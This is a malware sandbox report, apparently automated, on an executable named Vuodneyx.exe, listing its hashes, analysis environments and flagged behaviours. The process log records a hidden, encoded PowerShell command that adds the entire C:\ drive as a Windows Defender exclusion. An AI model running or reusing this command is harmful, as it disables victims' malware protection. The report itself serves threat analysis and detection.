Analysis
-
max time kernel
33s -
max time network
84s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2023 07:47
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Vuodneyx.exe
Resource
win7-20230712-en
windows7-x64
12 signatures
150 seconds
Behavioral task
behavioral2
Sample
Vuodneyx.exe
Resource
win10v2004-20230703-en
windows10-2004-x64
2 signatures
150 seconds
General
-
Target
Vuodneyx.exe
-
Size
664KB
-
MD5
f07259a0cd92a6c0640ff1acd0d1a54d
-
SHA1
270cc877c9b6571ec2b5c593dfba4f8ea4c5c966
-
SHA256
cfd11acb2343bcc79e51f5c9db8443e901894d7580b430aecf8338a71cf624de
-
SHA512
6d134f7121ebc3b4a53164c1be21b5428dad5c3dd24336398a9e07c933ca42387f498e93beeb61c9274683e497a781839a5b97404f14c3cfe1363e09b1116f28
-
SSDEEP
12288:RCsgkm2i2+G9fQ17xbNQ2aD68JzLiZ0A7zM7AJ6c7M3aXf5DhPvZi:wsZM7bQ2ebhyPzMk4c7fv5Dh3
Score
1/10
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Vuodneyx.exedescription pid process Token: SeDebugPrivilege 2432 Vuodneyx.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vuodneyx.exe"C:\Users\Admin\AppData\Local\Temp\Vuodneyx.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵PID:2904